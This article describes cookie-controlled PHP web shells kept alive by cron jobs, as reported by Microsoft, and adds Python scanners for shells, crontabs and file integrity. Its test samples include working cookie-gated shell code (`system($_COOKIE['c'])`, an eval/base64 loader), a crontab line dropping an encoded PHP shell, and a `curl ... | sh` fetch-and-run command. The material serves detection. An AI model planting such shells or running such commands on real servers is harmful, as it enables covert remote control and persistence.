Microsoft Details Cookie-Controlled PHP Web Shells Persisting via Cron on Linux Servers
Stealthy Persistence: Microsoft Uncovers Cookie-Controlled PHP Web Shells on Linux
TL;DR
Threat actors are using HTTP cookies as a covert control channel for PHP-based web shells on Linux servers. Commands arrive through PHP's $_COOKIE superglobal, and cron jobs give the shell "self-healing" persistence, so attackers keep remote code execution (RCE) while the shell stays dormant during normal traffic and leaves few traces in routine application logs.
The Microsoft Defender Security Research Team has released a detailed report on a shifting trend in web-based attacks: the use of HTTP cookies as a primary control mechanism for PHP web shells. Unlike traditional web shells that often rely on visible URL parameters or request bodies, these modern variants hide in plain sight by using cookie values to gate execution and deliver malicious payloads.
The Shift to Cookie-Controlled Execution
PHP has already parsed the request's Cookie header into the $_COOKIE superglobal by the time a script runs, so a shell can read attacker-supplied input at runtime with no parsing code of its own. The stealth gain is significant: cookies are a normal part of web traffic, and the "combined" access-log format that Apache and nginx commonly use records the request line, referrer and user agent but not the Cookie header, so a cookie-borne command is far less likely to stand out than a suspicious POST body or an unusual URL string.
Microsoft identified three primary implementations of this cookie-controlled model:
- Multi-layered Obfuscated Loaders: These use multiple layers of obfuscation and runtime checks to parse structured cookie input, eventually executing an encoded secondary payload.
- Segmented Data Reconstruction: Scripts that break down structured cookie data to reconstruct operational components—such as file handling or decoding functions—on the fly. These may conditionally write and execute a secondary payload to the disk.
- Marker-Based Triggers: Simple scripts that use a specific cookie value as a "marker." When this marker is detected, the script activates threat actor-controlled actions, including file uploads and command execution.
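The three implementations above share one static signature: a value read from $_COOKIE ends up in a condition, a decoder, or a code/command sink. The following is an added example, written for this article and not Microsoft's detection logic, that triages PHP sources for exactly those shapes. The rule set is a hand-written heuristic (an assumption a defender would tune), and the PHP fragments are constructed: a marker-gated shell, a marker whose payload travels in the POST body, an obfuscated loader, and two benign cookie uses that must not fire.

```python
"""Static triage of PHP sources for cookie-gated web-shell patterns.

Added example for this article, not Microsoft's detection logic: the rules
below are hand-written heuristics and the PHP fragments are constructed.
"""
import os
import re

# Sinks that turn an attacker-controlled string into code, a command, or a file.
SINKS = (r"\b(?:eval|assert|system|exec|shell_exec|passthru|popen|proc_open|"
         r"create_function|file_put_contents|move_uploaded_file)\b")
# Decoders typically wrapped around an encoded secondary payload.
DECODERS = r"\b(?:base64_decode|gzinflate|gzuncompress|str_rot13|hex2bin|strrev)\b"

RULES = {
    # A cookie value tested in a condition: the marker-based trigger.
    "cookie_marker_gate": re.compile(
        r"\bif\s*\(\s*!?\s*(?:(?:isset|empty)\s*\(\s*)?\$_COOKIE\[[^\]]+\]"),
    # A cookie value reaching a sink in the same statement, possibly via decoders.
    "cookie_to_sink": re.compile(SINKS + r"\s*\([^;]*?\$_COOKIE\["),
    # A decoder applied to a cookie value: the obfuscated/segmented loader style.
    "cookie_decoded": re.compile(DECODERS + r"\s*\([^;]*?\$_COOKIE\["),
}


def scan_php(source: str):
    """Return the sorted rule names that match the PHP source text."""
    return sorted(name for name, rx in RULES.items() if rx.search(source))


def is_suspicious(source: str) -> bool:
    """Two-stage verdict. A cookie feeding a sink or a decoder is enough on its
    own. A bare marker check is common in benign code (consent banners, A/B
    flags), so it only counts when the same file also calls a sink."""
    hits = set(scan_php(source))
    if hits & {"cookie_to_sink", "cookie_decoded"}:
        return True
    return "cookie_marker_gate" in hits and re.search(SINKS + r"\s*\(", source) is not None


def scan_tree(root):
    """Walk a web root and return {path: hits} for PHP files that look suspicious."""
    results = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            if name.lower().endswith((".php", ".phtml", ".php5", ".phar")):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    src = fh.read()
                if is_suspicious(src):
                    results[path] = scan_php(src)
    return results


# Constructed samples (not from the report). Each is a complete small PHP file.
MARKER_SHELL = """<?php
// marker in one cookie gates execution, the command arrives in another
if (isset($_COOKIE['sid_v']) && $_COOKIE['sid_v'] === 'q7') {
    system($_COOKIE['c']);
}
"""

MARKER_WITH_POST = """<?php
// the cookie is only the trigger; the payload itself travels in the POST body
if ($_COOKIE['t'] === 'go') { eval(base64_decode($_POST['d'])); }
"""

OBFUSCATED_LOADER = """<?php
// decoders wrap an encoded secondary stage carried in a cookie
@eval(gzinflate(base64_decode($_COOKIE['__utmz'])));
"""

BENIGN_CONSENT = """<?php
if (isset($_COOKIE['consent'])) { $show_banner = false; }
"""

BENIGN_LANG = """<?php
$lang = isset($_COOKIE['lang']) ? htmlspecialchars($_COOKIE['lang']) : 'en';
echo '<html lang="' . $lang . '">';
"""

if __name__ == "__main__":
    for label, src in [("marker shell", MARKER_SHELL), ("marker+POST", MARKER_WITH_POST),
                       ("obfuscated loader", OBFUSCATED_LOADER),
                       ("benign consent", BENIGN_CONSENT), ("benign lang", BENIGN_LANG)]:
        print(f"{label:18} suspicious={is_suspicious(src)!s:5} hits={scan_php(src)}")
```

The second stage in is_suspicious is what keeps the marker rule usable: a consent-banner check and a marker-based trigger look identical in isolation, and only the presence of a sink elsewhere in the same file separates them. Run scan_tree over a web root to get a worklist; anything it returns still needs a human to read the file, since obfuscation that splits `$_COOKIE` across string concatenation will slip past these regexes.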
Achieving "Self-Healing" Persistence via Cron
The research highlights a persistence strategy that combines the web application's own architecture with ordinary Linux system utilities. In the observed attacks, threat actors gained initial access with valid credentials or by exploiting known vulnerabilities.
Once inside, they installed a cron job that periodically invoked a shell script, which in turn executed an obfuscated PHP loader. The result is a "self-healing" architecture: even if an administrator finds and removes the malicious PHP file during cleanup, the scheduled task simply recreates it, so the RCE channel survives.
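What that cron job tends to look like, and how to audit for it, as an added example for this article (not Microsoft's tooling): a parser for /etc/crontab-style and per-user crontab entries, an indicator list that is an assumption a defender would tune, and a decoder for the common `echo <base64> | base64 -d > file` idiom so the auditor can see what the job drops. The crontab text is constructed.

```python
"""Audit crontab entries for the self-healing web-shell loader pattern.

Added example for this article, not Microsoft's tooling. The crontab text
is constructed, and the indicator list is an assumption a defender would
tune to the environment.
"""
import base64
import re

# Constructed /etc/crontab-style excerpt: two legitimate jobs and three that
# match the persistence pattern described in the article.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# standard jobs
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
0  2    * * *   root    /usr/bin/certbot renew --quiet
# re-drops an encoded PHP file into the upload directory every five minutes
*/5 *   * * *   www-data /bin/sh -c "echo PD9waHAgc3lzdGVtKCRfQ09PS0lFWydjJ10pOw== | base64 -d > /var/www/html/wp-content/uploads/.cache.php"
# runs a loader from a hidden directory under the web root
*/10 *  * * *   www-data /usr/bin/php /var/www/html/.x/ld.php
# fetches and executes a remote script at boot
@reboot         www-data curl -s http://192.0.2.10/l.sh | sh
"""

# Indicators of an interpreter, decoder, downloader or web-root write in a job.
INDICATORS = {
    "php_interpreter": re.compile(r"(?:^|[\s/;|&])php\d*(?:-cli)?\b"),
    "base64_decode": re.compile(r"base64\s+(?:-d|--decode)\b"),
    "remote_fetch_pipe": re.compile(r"\b(?:curl|wget)\b[^|;]*\|\s*(?:ba)?sh\b"),
    "writes_web_root": re.compile(r">\s*\S*(?:/var/www|/srv/www|public_html|htdocs)/"),
    "hidden_path": re.compile(r"/\.[^/\s]+"),
}
CRON_SPECIAL = re.compile(r"^@(?:reboot|yearly|annually|monthly|weekly|daily|midnight|hourly)\b")
ECHO_B64 = re.compile(
    r"echo\s+(?:-n\s+)?['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)")


def parse_crontab(text, system_format=True):
    """Return (schedule, user, command) tuples. system_format=True follows
    /etc/crontab and /etc/cron.d, which carry a user field; False follows
    per-user crontabs (crontab -l), which do not."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" in line.split(None, 1)[0]:
            continue  # blank, comment, or VAR=value assignment
        if CRON_SPECIAL.match(line):
            schedule, rest = line.split(None, 1)
        else:
            fields = line.split(None, 5)
            if len(fields) < 6:
                continue  # malformed entry
            schedule, rest = " ".join(fields[:5]), fields[5]
        if system_format:
            user_cmd = rest.split(None, 1)
            if len(user_cmd) != 2:
                continue
            user, command = user_cmd
        else:
            user, command = None, rest
        entries.append((schedule, user, command))
    return entries


def decode_embedded_payload(command):
    """If the job pipes an inline base64 blob through base64 -d, return the
    decoded text so the auditor can see what gets written; else None."""
    m = ECHO_B64.search(command)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8", "replace")
    except ValueError:
        return None


def audit_crontab(text, system_format=True):
    """One finding per entry that trips at least one indicator."""
    findings = []
    for schedule, user, command in parse_crontab(text, system_format):
        hits = sorted(name for name, rx in INDICATORS.items() if rx.search(command))
        payload = decode_embedded_payload(command)
        if payload and ("<?php" in payload or "$_COOKIE" in payload):
            hits.append("decoded_payload_is_php")
        if hits:
            findings.append({"schedule": schedule, "user": user, "command": command,
                             "indicators": hits, "payload": payload})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"[{', '.join(f['indicators'])}] {f['user']}: {f['command']}")
        if f["payload"]:
            print("    drops:", f["payload"])
```

In practice run it over /etc/crontab, every file in /etc/cron.d, and `crontab -l -u <user>` for each account that can write to the web root (the web server account above all, since a shell running as www-data can only create crontabs for itself). A job owned by the web server user that invokes an interpreter at all is worth a look even before any other indicator fires.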
Evading Detection and Logging
The dual-pronged approach of using cron for persistence and cookies for execution control allows the web shell to remain dormant during normal application runtime. It only "springs into action" when it receives a specific HTTP request containing the correct cookie values.
"By shifting execution control into cookies, the web shell can remain hidden in normal traffic, activating only during deliberate interactions," Microsoft noted. The approach reduces operational noise: routine application logs contain few, if any, observable indicators of compromise, because the only request that looks different is the one carrying the right cookie values, and the cookie itself is rarely logged.
Recommended Defensive Measures
Microsoft emphasizes that these threat actors do not necessarily rely on complex exploit chains. Instead, they abuse legitimate features of the environment, the web server process and the cron infrastructure, to preserve their access.
To counter these persistent web shells, Microsoft recommends the following security practices:
- Enforce MFA: Implement multi-factor authentication for all hosting control panels, SSH access, and administrative interfaces.
- Audit Scheduled Tasks: Regularly audit cron jobs across all web servers to identify unauthorized routines.
- Monitor Logins: Keep a close watch for unusual login activity, particularly on administrative accounts.
- Restrict Shell Access: Limit the shell capabilities of hosting control panels and restrict the execution of shell interpreters from the web server process where possible (for example, by listing system, exec, shell_exec, passthru and similar functions in PHP's disable_functions directive).
- File Integrity Monitoring: Check for suspicious file creations or modifications within web directories.
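The file-integrity recommendation is the one that catches the cron-driven "self-healing" described above: the tell is not just a new file but a file that was removed during cleanup and is back on the next sweep. The following is an added example for this article (not Microsoft's tooling) of a minimal hash-baseline monitor for a web root with that reappearance check; the sample tree and its contents are constructed, and the placeholder files are not working shells.

```python
"""File-integrity check that catches a web shell being re-dropped.

Added example for this article (not Microsoft's tooling): a minimal
hash-baseline monitor for a web root plus a check for files that were
removed during cleanup and later reappeared. The sample tree is constructed.
"""
import hashlib
import os
import tempfile


def snapshot(root):
    """Map each file's path relative to root to its SHA-256."""
    state = {}
    for dirpath, _, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            state[os.path.relpath(full, root)] = digest
    return state


def diff_snapshots(before, after):
    """Added, removed and content-changed paths between two snapshots."""
    common = before.keys() & after.keys()
    return {
        "added": sorted(after.keys() - before.keys()),
        "removed": sorted(before.keys() - after.keys()),
        "modified": sorted(p for p in common if before[p] != after[p]),
    }


def reappeared(baseline, after_cleanup, later):
    """Paths present in the baseline, absent right after cleanup, and present
    again later: the footprint of a scheduled task restoring a removed shell."""
    removed = baseline.keys() - after_cleanup.keys()
    return sorted(p for p in removed if p in later)


def demo():
    """Replay the cleanup-then-recreation sequence in a throwaway web root."""
    shell_rel = os.path.join("uploads", ".cache.php")
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, "uploads"))
        files = {
            "index.php": "<?php echo 'site'; ?>\n",
            "wp-config.php": "<?php define('DB_HOST', 'localhost'); ?>\n",
            # constructed stand-in for a dropped loader, not a working shell
            shell_rel: "<?php /* constructed placeholder for a cookie loader */ ?>\n",
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w") as fh:
                fh.write(body)
        baseline = snapshot(root)

        # The administrator removes the suspicious file.
        os.remove(os.path.join(root, shell_rel))
        after_cleanup = snapshot(root)

        # A cron job drops it again; the content need not match the original.
        with open(os.path.join(root, shell_rel), "w") as fh:
            fh.write("<?php /* re-dropped by a scheduled task, constructed */ ?>\n")
        later = snapshot(root)

    return {
        "cleanup_diff": diff_snapshots(baseline, after_cleanup),
        "later_diff": diff_snapshots(after_cleanup, later),
        "reappeared": reappeared(baseline, after_cleanup, later),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Keep the baseline somewhere the web server account cannot write, and take the post-cleanup snapshot immediately after removal so that a later reappearance is unambiguous. A path that shows up in reappeared is the cue to go look for the scheduler that restored it rather than deleting the file a second time.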
The consistent reuse of these techniques points to established web shell tradecraft being recycled, and it means defenders need to look beyond traditional inspection of URLs and request bodies and monitor for anomalies in standard request headers such as Cookie.